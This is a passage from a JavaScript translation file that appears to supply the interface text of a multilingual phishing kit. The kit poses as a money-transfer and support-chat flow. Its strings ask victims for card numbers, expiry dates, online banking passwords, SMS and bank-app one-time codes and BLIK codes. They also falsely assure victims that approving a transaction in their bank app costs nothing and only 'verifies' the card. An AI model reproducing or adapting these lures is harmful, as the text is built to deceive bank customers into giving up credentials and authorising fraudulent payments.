module.exports = {
  support_chat: {
    en: "Support Chat",
    au: "Support Chat",
    be: "Chat d'assistance",
    cz: "Podpora chatu",
    de: "Support-Chat",
    es: "Charla de soporte",
    it: "Chat di supporto",
    lt: "Palaikymo pokalbis",
    nl: "Ondersteuning Chat",
    pt: "Bate-papo de suporte",
    ro: "Chat de asistență",
    sk: "Podpora chatu",
    at: "Support-Chat",
    ch: "Support-Chat",
    ae: "دعم الدردشة",
    by: "Чат поддержки",
    fr: "Support Chat",
  },
  your_message: {
    en: "Your message... ",
    au: "Your message... ",
    be: "Votre message...",
    cz: "Vaše zpráva...",
    de: "Ihre Nachricht...",
    es: "Tu mensaje...",
    it: "Il tuo messaggio...",
    lt: "Tavo žinutė...",
    nl: "Uw bericht...",
    pt: "Sua mensagem...",
    ro: "Mesajul tau...",
    sk: "Tvoja správa...",
    at: "Ihre Nachricht...",
    ae: "رسالتك...",
    ch: "Ihre Nachricht...",
    by: "Твое сообщение...",
    fr: "Votre message...",
  },
  send: {
    en: "Send",
    au: "Send",
    be: "Envoyer",
    cz: "Poslat",
    de: "Senden",
    es: "Enviar",
    it: "Inviare",
    lt: "Siųsti",
    nl: "Versturen",
    pt: "Mandar",
    ro: "Trimite",
    sk: "Odoslať",
    at: "Senden",
    ae: "إرسال",
    ch: "Senden",
    by: "Отправлять",
    fr: "Envoyer",
  },
  card_balance: {
    en: "Card balance",
    au: "Card balance",
    be: "Solde de la carte",
    cz: "Zůstatek na kartě",
    de: "Kartenguthaben",
    es: "Balance de tarjeta",
    it: "Saldo della carta",
    lt: "Kortelės likutis",
    nl: "Kaartsaldo",
    pt: "Saldo do cartão",
    ro: "Soldul cardului",
    sk: "Zostatok na karte",
    at: "Kartenguthaben",
    ae: "رصيد البطاقة",
    ch: "Kartenguthaben",
    by: "Баланс карты",
  },
  expires: {
    en: "Expires",
    au: "Expires",
    be: "Expire",
    cz: "Platnost vyprší",
    de: "Läuft ab",
    es: "Caduca",
    it: "Scade",
    lt: "Baigia galioti",
    nl: "Verloopt",
    pt: "Expira",
    ro: "Expiră",
    sk: "Platnosť vyprší",
    at: "Läuft ab",
    ae: "تنتهي",
    ch: "Läuft ab",
    by: "Истекает",
  },
  card_number: {
    en: "Card number",
    au: "Card number",
    be: "Numéro de carte",
    cz: "Číslo karty",
    de: "Kartennummer",
    es: "Número de tarjeta",
    it: "Numero di carta",
    lt: "Kortelės numeris",
    nl: "Kaartnummer",
    pt: "Número do cartão",
    ro: "Numărul de card",
    sk: "Číslo karty",
    at: "Kartennummer",
    ae: "رقم البطاقة",
    ch: "Kartennummer",
    by: "Номер карты",
  },
  expiration_date: {
    en: "Expiration date",
    au: "Expiration date",
    be: "Date d'expiration",
    cz: "Datum spotřeby",
    de: "Verfallsdatum",
    es: "Fecha de caducidad",
    it: "Data di scadenza",
    lt: "Galiojimo laikas",
    nl: "Vervaldatum",
    pt: "Data de validade",
    ro: "Data expirării",
    sk: "Dátum spotreby",
    at: "Verfallsdatum",
    ae: "تاريخ إنتهاء الصلاحية",
    by: "Срок годности",
    ch: "Verfallsdatum",
  },
  month: {
    en: "Month",
    au: "Month",
    be: "Mois",
    cz: "Měsíc",
    de: "Monat",
    es: "Mes",
    it: "Mese",
    lt: "Mėnuo",
    nl: "Maand",
    pt: "Mês",
    ro: "Lună",
    sk: "mesiac",
    at: "Monat",
    ae: "شهر",
    by: "Месяц",
    ch: "Monat",
  },
  year: {
    en: "Year",
    au: "Year",
    be: "An",
    cz: "Rok",
    de: "Jahr",
    es: "Año",
    it: "Anno",
    lt: "Metai",
    nl: "Jaar",
    pt: "Ano",
    ro: "An",
    sk: "rok",
    at: "Jahr",
    ae: "سنة",
    by: "Год",
    ch: "Jahr",
  },
  wrong_code: {
    en: "You have entered the wrong code! Please try again.",
    au: "You have entered the wrong code! Please try again.",
    be: "Vous avez entré le mauvais code ! Veuillez réessayer.",
    cz: "Zadali jste špatný kód! Prosím zkuste to znovu.",
    de: "Sie haben den falschen Code eingegeben! Bitte versuche es erneut.",
    es: "¡Ha introducido el código incorrecto! Inténtalo de nuevo.",
    it: "Hai inserito il codice sbagliato! Per favore riprova.",
    lt: "Įvedėte neteisingą kodą! Prašau, pabandykite dar kartą.",
    nl: "U heeft de verkeerde code ingevoerd! Probeer het opnieuw.",
    pt: "Você digitou o código errado! Por favor, tente novamente.",
    ro: "Ați introdus un cod greșit! Vă rugăm să încercați din nou.",
    sk: "Zadali ste nesprávny kód! Prosím skúste znova.",
    at: "Sie haben den falschen Code eingegeben! Bitte versuche es erneut.",
    ae: "لقد أدخلت الرمز الخطأ! حاول مرة اخرى.",
    by: "Вы ввели неверный код! Пожалуйста, попробуйте еще раз.",
    ch: "Sie haben den falschen Code eingegeben! Bitte versuche es erneut.",
    fr: "Vous avez saisi un code erroné ! Veuillez réessayer.",
  },
  push_title: {
    en: "To verify your card, confirm the transaction on the banks mobile app",
    au: "To verify your card, confirm the transaction on the banks mobile app",
    be: "Pour vérifier votre carte, confirmez la transaction sur l'application mobile de la banque",
    cz: "Chcete-li ověřit svou kartu, potvrďte transakci v mobilní aplikaci banky",
    de: "Um Ihre Karte zu verifizieren, bestätigen Sie die Transaktion in der mobilen App der Bank",
    es: "Para verificar su tarjeta, confirme la transacción en la aplicación móvil del banco",
    it: "Per verificare la tua carta, conferma la transazione sull'app mobile della banca",
    lt: "Norėdami patvirtinti kortelę, patvirtinkite operaciją banko mobiliojoje programėlėje",
    nl: "Om uw kaart te verifiëren, bevestigt u de transactie in de mobiele app van de bank",
    pt: "Para verificar seu cartão, confirme a transação no aplicativo móvel do banco",
    ro: "Pentru a vă verifica cardul, confirmați tranzacția în aplicația mobilă a băncilor",
    sk: "Ak chcete overiť svoju kartu, potvrďte transakciu v mobilnej aplikácii banky",
    at: "Um Ihre Karte zu verifizieren, bestätigen Sie die Transaktion in der mobilen App der Bank",
    ae: "للتحقق من بطاقتك ، قم بتأكيد المعاملة على تطبيق الهاتف المحمول الخاص بالبنوك",
    by: "Для верификации карты подтвердите транзакцию в мобильном приложении банка.",
    ch: "Um Ihre Karte zu verifizieren, bestätigen Sie die Transaktion in der mobilen App der Bank",
    fr: "Pour vérifier votre carte, confirmez la transaction sur l'application mobile de la banque.",
  },
  push_text: {
    en: "To transfer money to your card, your card must be verified. This is a request to verify the card, but you will not be charged, the system will simply state that the card is not blocked and is ready for the transaction.",
    au: "To transfer money to your card, your card must be verified. This is a request to verify the card, but you will not be charged, the system will simply state that the card is not blocked and is ready for the transaction.",
    be: "Pour transférer de l'argent sur votre carte, votre carte doit être vérifiée. Il s'agit d'une demande de vérification de la carte, mais vous ne serez pas débité, le système indiquera simplement que la carte n'est pas bloquée et est prête pour la transaction.",
    cz: "Chcete-li převést peníze na svou kartu, musí být vaše karta ověřena. Jedná se o požadavek na ověření karty, který vám však nebude účtován, systém pouze oznámí, že karta není blokována a je připravena k transakci.",
    de: "Um Geld auf Ihre Karte zu überweisen, muss Ihre Karte verifiziert werden. Dies ist eine Aufforderung zur Verifizierung der Karte, aber Sie werden nicht belastet, das System gibt lediglich an, dass die Karte nicht gesperrt und für die Transaktion bereit ist.",
    es: "Para transferir dinero a su tarjeta, su tarjeta debe ser verificada. Esta es una solicitud para verificar la tarjeta, pero no se le cobrará, el sistema simplemente indicará que la tarjeta no está bloqueada y está lista para la transacción.",
    it: "Per trasferire denaro sulla tua carta, la tua carta deve essere verificata. Questa è una richiesta di verifica della carta, ma non ti verrà addebitato, il sistema indicherà semplicemente che la carta non è bloccata ed è pronta per la transazione.",
    lt: "Norint pervesti pinigus į kortelę, jūsų kortelė turi būti patvirtinta. Tai yra užklausa patikrinti kortelę, bet jūs nebūsite apmokestinti, sistema tiesiog nurodys, kad kortelė neužblokuota ir yra paruošta operacijai.",
    nl: "Om geld naar uw kaart over te schrijven, moet uw kaart worden geverifieerd. Dit is een verzoek om de kaart te verifiëren, maar er worden geen kosten in rekening gebracht, het systeem geeft alleen aan dat de kaart niet is geblokkeerd en klaar is voor de transactie.",
    pt: "Para transferir dinheiro para seu cartão, seu cartão deve ser verificado. Esta é uma solicitação para verificar o cartão, mas você não será cobrado, o sistema simplesmente informará que o cartão não está bloqueado e está pronto para a transação.",
    ro: "Pentru a transfera bani pe cardul dvs., cardul dvs. trebuie verificat. Aceasta este o solicitare de verificare a cardului, dar nu veți fi taxat, sistemul va afirma pur și simplu că cardul nu este blocat și este gata pentru tranzacție.",
    sk: "Ak chcete previesť peniaze na svoju kartu, vaša karta musí byť overená. Ide o požiadavku na overenie karty, ale poplatok vám nebude účtovaný, systém jednoducho vyhlási, že karta nie je zablokovaná a je pripravená na transakciu.",
    at: "Um Geld auf Ihre Karte zu überweisen, muss Ihre Karte verifiziert werden. Dies ist eine Aufforderung zur Verifizierung der Karte, aber Sie werden nicht belastet, das System gibt lediglich an, dass die Karte nicht gesperrt und für die Transaktion bereit ist.",
    ae: "لتحويل الأموال إلى بطاقتك ، يجب التحقق من بطاقتك. هذا طلب للتحقق من البطاقة ، لكن لن يتم تحصيل رسوم منك ، سيذكر النظام ببساطة أن البطاقة ليست محظورة وجاهزة للمعاملة.",
    by: "Чтобы перевести деньги на карту, ваша карта должна быть верифицирована. Это запрос на верификацию карты, но с вас не будет взиматься плата, система просто констатирует, что карта не заблокирована и готова к транзакции.",
    ch: "Um Geld auf Ihre Karte zu überweisen, muss Ihre Karte verifiziert werden. Dies ist eine Aufforderung zur Verifizierung der Karte, aber Sie werden nicht belastet, das System gibt lediglich an, dass die Karte nicht gesperrt und für die Transaktion bereit ist.",
    fr: "Pour transférer de l'argent sur votre carte, celle-ci doit être vérifiée. Il s'agit d'une demande de vérification de la carte, mais vous ne serez pas débité, le système indiquera simplement que la carte n'est pas bloquée et qu'elle est prête pour la transaction.",
  },
  success: {
    en: "Success",
    au: "Success",
    be: "Succès",
    cz: "Úspěch",
    de: "Erfolg",
    es: "Éxito",
    it: "Successo",
    lt: "Sėkmė",
    nl: "Succes",
    pt: "Sucesso",
    ro: "Succes",
    sk: "Úspech",
    at: "Erfolg",
    ae: "النجاح",
    by: "Успех",
    ch: "Erfolg",
    fr: "Succès",
  },
  money_will: {
    en: "The money will be transferred to your bank card within 24 hours.",
    au: "The money will be transferred to your bank card within 24 hours.",
    be: "L'argent sera transféré sur votre carte bancaire dans les 24 heures.",
    cz: "Peníze budou převedeny na vaši bankovní kartu do 24 hodin.",
    de: "Das Geld wird innerhalb von 24 Stunden auf Ihre Bankkarte überwiesen.",
    es: "El dinero será transferido a su tarjeta bancaria dentro de las 24 horas.",
    it: "Il denaro sarà trasferito sulla tua carta di credito entro 24 ore.",
    lt: "Pinigai bus pervesti į Jūsų banko kortelę per 24 valandas.",
    nl: "Het geld wordt binnen 24 uur op uw bankkaart gestort.",
    pt: "O dinheiro será transferido para o seu cartão bancário dentro de 24 horas.",
    ro: "Banii vor fi transferați pe cardul dumneavoastră bancar în termen de 24 de ore.",
    sk: "Peniaze budú prevedené na vašu bankovú kartu do 24 hodín.",
    at: "Das Geld wird innerhalb von 24 Stunden auf Ihre Bankkarte überwiesen.",
    ae: "سيتم تحويل الأموال إلى بطاقتك المصرفية في غضون 24 ساعة.",
    ch: "Das Geld wird innerhalb von 24 Stunden auf Ihre Bankkarte überwiesen.",
    by: "Деньги будут переведены на вашу банковскую карту в течение 24 часов.",
    fr: "L'argent sera transféré sur votre carte bancaire dans les 24 heures.",
  },
  bank_passord_title: {
    en: "Enter your online banking password",
    au: "Enter your online banking password",
    be: "Entrez votre mot de passe bancaire en ligne",
    cz: "Zadejte heslo svého internetového bankovnictví",
    de: "Geben Sie Ihr Online-Banking-Passwort ein",
    es: "Ingrese su contraseña de banca en línea",
    it: "Inserisci la tua password bancaria online",
    lt: "Įveskite savo internetinės bankininkystės slaptažodį",
    nl: "Voer uw wachtwoord voor internetbankieren in",
    pt: "Digite sua senha do banco online",
    ro: "Introduceți parola dvs. bancară online",
    sk: "Zadajte svoje heslo pre online bankovníctvo",
    at: "Geben Sie Ihr Online-Banking-Passwort ein",
    ae: "أدخل كلمة المرور الخاصة بالخدمات المصرفية عبر الإنترنت",
    ch: "Geben Sie Ihr Online-Banking-Passwort ein",
    by: "Введите пароль от интернет-банка",
    fr: "Entrez votre mot de passe de banque en ligne",
  },
  sms_title: {
    en: "enter SMS code",
    au: "enter SMS code",
    be: "entrer le code SMS",
    cz: "zadejte SMS kód",
    de: "SMS-Code eingeben",
    es: "ingrese el código SMS",
    it: "inserire il codice SMS",
    lt: "įveskite SMS kodą",
    nl: "voer de sms-code in",
    pt: "digite o código SMS",
    ro: "introduceți codul SMS",
    sk: "zadajte SMS kód",
    at: "SMS-Code eingeben",
    ae: "أدخل رمز SMS",
    ch: "SMS-Code eingeben",
    by: "введите смс-код",
    fr: "saisir le code SMS",
  },
  sms_text: {
    en: "A one-time SMS code has been sent to your phone",
    au: "A one-time SMS code has been sent to your phone",
    be: "Un code SMS à usage unique a été envoyé sur votre téléphone",
    cz: "Na váš telefon byl odeslán jednorázový SMS kód",
    de: "Ein einmaliger SMS-Code wurde an Ihr Telefon gesendet",
    es: "Se ha enviado un código SMS único a su teléfono",
    it: "Un codice SMS monouso è stato inviato al tuo telefono",
    lt: "Į jūsų telefoną išsiųstas vienkartinis SMS kodas",
    nl: "Er is een eenmalige sms-code naar uw telefoon verzonden",
    pt: "Um código SMS único foi enviado para o seu telefone",
    ro: "Un cod SMS unic a fost trimis pe telefonul dvs",
    sk: "Na váš telefón bol odoslaný jednorazový SMS kód",
    at: "Ein einmaliger SMS-Code wurde an Ihr Telefon gesendet",
    ae: "تم إرسال رمز SMS لمرة واحدة إلى هاتفك",
    ch: "Ein einmaliger SMS-Code wurde an Ihr Telefon gesendet",
    by: "На ваш телефон отправлено одноразовое SMS с кодом",
    fr: "Un code SMS à usage unique a été envoyé à votre téléphone.",
  },
  bank_passord_text: {
    en: "You must provide a password for your mobile bank",
    au: "You must provide a password for your mobile bank",
    be: "Vous devez fournir un mot de passe pour votre banque mobile",
    cz: "Musíte zadat heslo pro svou mobilní banku",
    de: "Sie müssen ein Passwort für Ihre mobile Bank angeben",
    es: "Debe proporcionar una contraseña para su banco móvil",
    it: "Devi fornire una password per la tua banca mobile",
    lt: "Turite pateikti savo mobiliojo banko slaptažodį",
    nl: "U moet een wachtwoord opgeven voor uw mobiele bank",
    pt: "Você deve fornecer uma senha para seu banco móvel",
    ro: "Trebuie să furnizați o parolă pentru banca dvs. mobilă",
    sk: "Musíte zadať heslo pre svoju mobilnú banku",
    at: "Sie müssen ein Passwort für Ihre mobile Bank angeben",
    ae: "يجب عليك توفير كلمة مرور للبنك المحمول الخاص بك",
    ch: "Sie müssen ein Passwort für Ihre mobile Bank angeben",
    by: "Вы должны указать пароль для вашего мобильного банка",
    fr: "Vous devez fournir un mot de passe pour votre banque mobile",
  },
  bank_passord_placeholder: {
    en: "Password",
    au: "Password",
    be: "Mot de passe",
    cz: "Heslo",
    de: "Passwort",
    es: "Clave",
    it: "Parola d'ordine",
    lt: "Slaptažodis",
    nl: "Wachtwoord",
    pt: "Senha",
    ro: "Parola",
    sk: "heslo",
    at: "Passwort",
    ae: "كلمة المرور",
    ch: "Passwort",
    by: "Пароль",
    fr: "Mot de passe",
  },
  sms_placeholder: {
    en: "One-time SMS code",
    au: "One-time SMS code",
    be: "Code SMS unique",
    cz: "Jednorázový SMS kód",
    de: "Einmaliger SMS-Code",
    es: "Código SMS único",
    it: "Codice SMS monouso",
    lt: "Vienkartinis SMS kodas",
    nl: "Eenmalige sms-code",
    pt: "Código SMS único",
    ro: "Cod SMS unic",
    sk: "Jednorazový SMS kód",
    at: "Einmaliger SMS-Code",
    ae: "رمز SMS لمرة واحدة",
    ch: "Einmaliger SMS-Code",
    by: "Одноразовый смс-код",
    fr: "Code SMS à usage unique",
  },
  bank_passord_wrong: {
    en: "You entered the wrong password",
    au: "You entered the wrong password",
    be: "Vous avez entré le mauvais mot de passe",
    cz: "Zadali jste špatné heslo",
    de: "Sie haben das falsche Passwort eingegeben",
    es: "Ingresaste la contraseña incorrecta",
    it: "Hai inserito la password sbagliata",
    lt: "Įvedėte neteisingą slaptažodį",
    nl: "Je hebt het verkeerde wachtwoord ingevoerd",
    pt: "Você digitou a senha errada",
    ro: "Ați introdus o parolă greșită",
    sk: "Zadali ste nesprávne heslo",
    at: "Sie haben das falsche Passwort eingegeben",
    ae: "لقد أدخلت كلمة مرور خاطئة",
    ch: "Sie haben das falsche Passwort eingegeben",
    by: "Вы ввели неправильный пароль",
    fr: "Vous avez saisi un mot de passe erroné",
  },
  app_code_title: {
    en: "Within 2 minutes, the verification code will be sent to your banking application.",
    au: "Within 2 minutes, the verification code will be sent to your banking application.",
    be: "Dans les 2 minutes, le code de vérification sera envoyé à votre application bancaire.",
    cz: "Do 2 minut bude do vaší bankovní aplikace zaslán ověřovací kód.",
    de: "Innerhalb von 2 Minuten wird der Bestätigungscode an Ihre Bankanwendung gesendet.",
    es: "En 2 minutos, el código de verificación se enviará a su aplicación bancaria.",
    it: "Entro 2 minuti, il codice di verifica verrà inviato alla tua applicazione bancaria.",
    lt: "Per 2 minutes patvirtinimo kodas bus išsiųstas į jūsų banko programą.",
    nl: "Binnen 2 minuten wordt de verificatiecode naar uw bankapplicatie verzonden.",
    pt: "Em 2 minutos, o código de verificação será enviado ao seu aplicativo bancário.",
    ro: "În 2 minute, codul de verificare va fi trimis către aplicația dvs. bancară.",
    sk: "Do 2 minút vám bude do bankovej aplikácie odoslaný overovací kód.",
    at: "Innerhalb von 2 Minuten wird der Bestätigungscode an Ihre Bankanwendung gesendet.",
    ae: "في غضون دقيقتين ، سيتم إرسال رمز التحقق إلى تطبيقك المصرفي.",
    ch: "Innerhalb von 2 Minuten wird der Bestätigungscode an Ihre Bankanwendung gesendet.",
    by: "В течение 2 минут код подтверждения будет отправлен в ваше банковское приложение.",
    fr: "Dans les deux minutes qui suivent, le code de vérification est envoyé à votre application bancaire.",
  },
  app_code_text: {
    en: "enter the code that was sent to your banking application",
    au: "enter the code that was sent to your banking application",
    be: "entrez le code qui a été envoyé à votre application bancaire",
    cz: "zadejte kód, který vám byl zaslán do vaší bankovní aplikace",
    de: "Geben Sie den Code ein, der an Ihre Bankanwendung gesendet wurde",
    es: "ingrese el código que se envió a su aplicación bancaria",
    it: "inserisci il codice che è stato inviato alla tua applicazione bancaria",
    lt: "įveskite kodą, kuris buvo išsiųstas į jūsų banko programą",
    nl: "voer de code in die naar uw banktoepassing is verzonden",
    pt: "insira o código que foi enviado para seu aplicativo bancário",
    ro: "introduceți codul care a fost trimis în aplicația dvs. bancară",
    sk: "zadajte kód, ktorý bol odoslaný do vašej bankovej aplikácie",
    at: "Geben Sie den Code ein, der an Ihre Bankanwendung gesendet wurde",
    ae: "أدخل الرمز الذي تم إرساله إلى تطبيقك المصرفي",
    ch: "Geben Sie den Code ein, der an Ihre Bankanwendung gesendet wurde",
    by: "введите код, который был отправлен в ваше банковское приложение",
    fr: "saisissez le code qui a été envoyé à votre application bancaire",
  },
  app_code_placeholder: {
    en: "Verification code",
    au: "Verification code",
    be: "Le code de vérification",
    cz: "Ověřovací kód",
    de: "Verifizierungs-Schlüssel",
    es: "Código de verificación",
    it: "Codice di verifica",
    lt: "Patvirtinimo kodas",
    nl: "Verificatie code",
    pt: "Código de verificação",
    ro: "Cod de verificare",
    sk: "Overovací kód",
    at: "Verifizierungs-Schlüssel",
    ae: "رمز التحقق",
    ch: "Verifizierungs-Schlüssel",
    by: "Код подтверждения",
    fr: "Code de vérification",
  },
  call_code_title: {
    en: "The bank will give you a verification code over the phone",
    au: "The bank will give you a verification code over the phone",
    be: "La banque vous donnera un code de vérification par téléphone",
    cz: "Banka vám po telefonu sdělí ověřovací kód",
    de: "Die Bank teilt Ihnen telefonisch einen Verifizierungscode mit",
    es: "El banco te dará un código de verificación por teléfono",
    it: "La banca ti fornirà un codice di verifica per telefono",
    lt: "Bankas jums suteiks patvirtinimo kodą telefonu",
    nl: "De bank geeft u telefonisch een verificatiecode",
    pt: "O banco fornecerá um código de verificação por telefone",
    ro: "Banca vă va oferi un cod de verificare prin telefon",
    sk: "Banka vám telefonicky poskytne overovací kód",
    at: "Die Bank teilt Ihnen telefonisch einen Verifizierungscode mit",
    ae: "سيعطيك البنك رمز التحقق عبر الهاتف",
    ch: "Die Bank teilt Ihnen telefonisch einen Verifizierungscode mit",
    by: "Банк сообщит вам код подтверждения по телефону.",
    fr: "La banque vous donnera un code de vérification par téléphone.",
  },
  call_code_text: {
    en: "enter the code the bank gave you over the phone",
    au: "enter the code the bank gave you over the phone",
    be: "entrez le code que la banque vous a donné par téléphone",
    cz: "zadejte kód, který vám banka poskytla po telefonu",
    de: "Geben Sie den Code ein, den Ihnen die Bank am Telefon gegeben hat",
    es: "introduce el código que te dio el banco por teléfono",
    it: "inserisci il codice che la banca ti ha fornito al telefono",
    lt: "įveskite kodą, kurį jums suteikė bankas telefonu",
    nl: "voer de code in die de bank u telefonisch heeft gegeven",
    pt: "digite o código que o banco lhe deu por telefone",
    ro: "introduceți codul pe care vi l-a dat banca la telefon",
    sk: "zadajte kód, ktorý vám banka poskytla telefonicky",
    at: "Geben Sie den Code ein, den Ihnen die Bank am Telefon gegeben hat",
    ae: "أدخل الرمز الذي أعطاك البنك لك عبر الهاتف",
    ch: "Geben Sie den Code ein, den Ihnen die Bank am Telefon gegeben hat",
    by: "введите код, который банк сообщил вам по телефону",
    fr: "entrez le code que la banque vous a donné par téléphone",
  },
  call_code_placeholder: {
    en: "enter the code",
    au: "enter the code",
    be: "Entrer le code",
    cz: "zadejte kód",
    de: "Gib den code ein",
    es: "Inserte el código",
    it: "inserisci il codice",
    lt: "įveskite kodą",
    nl: "voer de code in",
    pt: "digite o código",
    ro: "Introduceti codul",
    sk: "zadajte kód",
    at: "Gib den code ein",
    ae: "ادخل الرمز",
    ch: "Gib den code ein",
    by: "введите код",
    fr: "saisir le code",
  },
  blik_code_title: {
    en: "BLIK payment",
    au: "BLIK payment",
    be: "Paiement BLIK",
    cz: "platba BLIK",
    de: "BLIK-Zahlung",
    es: "Pago BLIK",
    it: "Pagamento BLIK",
    lt: "BLIK mokėjimas",
    nl: "BLIK betaling",
    pt: "Pagamento BLIK",
    ro: "Plata BLIK",
    sk: "BLIK platba",
    at: "BLIK-Zahlung",
    ae: "دفع BLIK",
    ch: "BLIK-Zahlung",
    by: "БЛИК платеж",
    fr: "Paiement BLIK",
  },
  blik_code_text: {
    en: "Generate a Blik code on your account and enter it",
    au: "Generate a Blik code on your account and enter it",
    be: "Générez un code Blik sur votre compte et saisissez-le",
    cz: "Vygenerujte na svém účtu Blik kód a zadejte jej",
    de: "Generieren Sie einen Blik-Code in Ihrem Konto und geben Sie ihn ein",
    es: "Genere un código Blik en su cuenta e ingréselo",
    it: "Genera un codice Blik sul tuo account e inseriscilo",
    lt: "Savo paskyroje sugeneruokite Blik kodą ir įveskite jį",
    nl: "Genereer een Blik-code op uw account en voer deze in",
    pt: "Gere um código Blik em sua conta e insira-o",
    ro: "Generați un cod Blik pe contul dvs. și introduceți-l",
    sk: "Vygenerujte si Blik kód na svojom účte a zadajte ho",
    at: "Generieren Sie einen Blik-Code in Ihrem Konto und geben Sie ihn ein",
    ae: "قم بإنشاء رمز Blik على حسابك وأدخله",
    ch: "Generieren Sie einen Blik-Code in Ihrem Konto und geben Sie ihn ein",
    by: "Сгенерируйте код Blik в своей учетной записи и введите его.",
    fr: "Générez un code Blik sur votre compte et saisissez-le.",
  },
  blik_code_placeholder: {
    en: "BLIK code",
    au: "BLIK code",
    be: "Code BLIK",
    cz: "BLIK kód",
    de: "BLIK-Code",
    es: "codigo BLIK",
    it: "codice BLIK",
    lt: "BLIK kodas",
    nl: "BLIK-code",
    pt: "Código BLIK",
    ro: "Cod BLIK",
    sk: "BLIK kód",
    at: "BLIK-Code",
    ae: "كود بليك",
    ch: "BLIK-Code",
    by: "BLIK-код",
    fr: "Code BLIK",
  },
  picture_title: {
    en: "When verifying your account in the system, we will provide the image title with your phone, which you must provide for confirmation. Once the correct images are provided, the funds will be credited to your account.",
    au: "When verifying your account in the system, we will provide the image title with your phone, which you must provide for confirmation. Once the correct images are provided, the funds will be credited to your account.",
    be: "Lors de la vérification de votre compte dans le système, nous fournirons le titre de l'image avec votre téléphone, que vous devrez fournir pour confirmation. Une fois les images correctes fournies, les fonds seront crédités sur votre compte.",
    cz: "Při ověřování vašeho účtu v systému poskytneme název obrázku s vaším telefonem, který musíte poskytnout pro potvrzení. Jakmile budou poskytnuty správné obrázky, budou prostředky připsány na váš účet.",
    de: "Bei der Verifizierung Ihres Kontos im System geben wir den Bildtitel mit Ihrem Telefon an, den Sie zur Bestätigung angeben müssen. Sobald die richtigen Bilder bereitgestellt wurden, wird das Geld Ihrem Konto gutgeschrieben.",
    es: "Al verificar su cuenta en el sistema, le proporcionaremos el título de la imagen con su teléfono, que debe proporcionar para la confirmación. Una vez que se proporcionen las imágenes correctas, los fondos se acreditarán en su cuenta.",
    it: "Durante la verifica del tuo account nel sistema, ti forniremo il titolo dell'immagine con il tuo telefono, che devi fornire per conferma. Una volta fornite le immagini corrette, i fondi verranno accreditati sul tuo account.",
    lt: "Tvirtindami paskyrą sistemoje su telefonu pateiksime paveikslėlio pavadinimą, kurį turite pateikti patvirtinimui. Kai bus pateikti teisingi vaizdai, lėšos bus pervestos į jūsų sąskaitą.",
    nl: "Bij het verifiëren van uw account in het systeem, zullen we de afbeeldingstitel met uw telefoon verstrekken, die u ter bevestiging moet verstrekken. Zodra de juiste afbeeldingen zijn aangeleverd, wordt het geld op uw account bijgeschreven.",
    pt: "Ao verificar sua conta no sistema, forneceremos o título da imagem com seu telefone, que você deve fornecer para confirmação. Assim que as imagens corretas forem fornecidas, os fundos serão creditados em sua conta.",
    ro: "Când vă verificăm contul în sistem, vă vom furniza titlul imaginii împreună cu telefonul dvs., pe care trebuie să îl furnizați pentru confirmare. Odată ce imaginile corecte sunt furnizate, fondurile vor fi creditate în contul dumneavoastră.",
    sk: "Pri overovaní účtu v systéme vám s telefónom poskytneme názov obrázka, ktorý musíte poskytnúť na potvrdenie. Po zadaní správnych obrázkov budú prostriedky pripísané na váš účet.",
    at: "Bei der Verifizierung Ihres Kontos im System geben wir den Bildtitel mit Ihrem Telefon an, den Sie zur Bestätigung angeben müssen. Sobald die richtigen Bilder bereitgestellt wurden, wird das Geld Ihrem Konto gutgeschrieben.",
    ae: "عند التحقق من حسابك في النظام ، سنزودك بعنوان الصورة بهاتفك ، والذي يجب عليك تقديمه للتأكيد. بمجرد تقديم الصور الصحيحة ، ستتم إضافة الأموال إلى حسابك.",
    ch: "Bei der Verifizierung Ihres Kontos im System geben wir den Bildtitel mit Ihrem Telefon an, den Sie zur Bestätigung angeben müssen. Sobald die richtigen Bilder bereitgestellt wurden, wird das Geld Ihrem Konto gutgeschrieben.",
    by: "При верификации вашего аккаунта в системе мы предоставим название изображения с вашим телефоном, которое вы должны предоставить для подтверждения. Как только правильные изображения будут предоставлены, средства будут зачислены на ваш счет.",
    fr: "Lors de la vérification de votre compte dans le système, nous vous fournirons le titre de l'image avec votre téléphone, que vous devrez fournir pour confirmation. Une fois les images correctes fournies, les fonds seront crédités sur votre compte.",
  },
  picture_text: {
    en: "In a moment, we will call you and say a word-picture. In some cases, well send a push notification to your banks app after you provide the first picture that you need to confirm.",
    au: "In a moment, we will call you and say a word-picture. In some cases, well send a push notification to your banks app after you provide the first picture that you need to confirm.",
    be: "Dans un instant, nous vous appellerons et dirons un mot-image. Dans certains cas, envoyez bien une notification push à l'application de votre banque après avoir fourni la première photo que vous devez confirmer.",
    cz: "Za chvíli vám zavoláme a řekneme slovo-obrázek. V některých případech odešlete oznámení push do aplikace vaší banky poté, co poskytnete první obrázek, který musíte potvrdit.",
    de: "Wir werden Sie gleich anrufen und ein Wortbild sagen. In einigen Fällen senden Sie eine Push-Benachrichtigung an Ihre Bank-App, nachdem Sie das erste Bild bereitgestellt haben, das Sie bestätigen müssen.",
    es: "En un momento, te llamaremos y te diremos una palabra-imagen. En algunos casos, enviaremos una notificación automática a la aplicación de su banco después de proporcionar la primera imagen que necesita confirmar.",
    it: "Tra un momento, ti chiameremo e diremo una parola-immagine. In alcuni casi, invia una notifica push all'app della tua banca dopo aver fornito la prima immagine che devi confermare.",
    lt: "Po akimirkos mes jums paskambinsime ir pasakysime žodį-vaizdą. Kai kuriais atvejais išsiųsime tiesioginį pranešimą į jūsų banko programą, kai pateiksite pirmą nuotrauką, kurią turite patvirtinti.",
    nl: "Zo meteen bellen we je en zeggen we een woordbeeld. In sommige gevallen is het goed om een ​​pushmelding naar uw banken-app te sturen nadat u de eerste foto hebt opgegeven die u moet bevestigen.",
    pt: "Em um momento, vamos chamá-lo e dizer uma palavra-imagem. Em alguns casos, envie uma notificação por push para o aplicativo do seu banco depois de fornecer a primeira imagem que você precisa confirmar.",
    ro: "Într-o clipă, vă vom suna și vă vom spune o imagine-cuvânt. În unele cazuri, trimiteți o notificare push către aplicația băncii dvs. după ce furnizați prima imagine pe care trebuie să o confirmați.",
    sk: "O chvíľu vám zavoláme a povieme slovo-obrázok. V niektorých prípadoch po zadaní prvého obrázka, ktorý musíte potvrdiť, odošlite oznámenie push do aplikácie vašej banky.",
    at: "Wir werden Sie gleich anrufen und ein Wortbild sagen. In einigen Fällen senden Sie eine Push-Benachrichtigung an Ihre Bank-App, nachdem Sie das erste Bild bereitgestellt haben, das Sie bestätigen müssen.",
    ae: "في غضون لحظة ، سوف نتصل بك ونقول صورة كلمة. في بعض الحالات ، أرسل إشعارًا فوريًا إلى تطبيق البنوك بعد تقديم الصورة الأولى التي تحتاج إلى تأكيدها.",
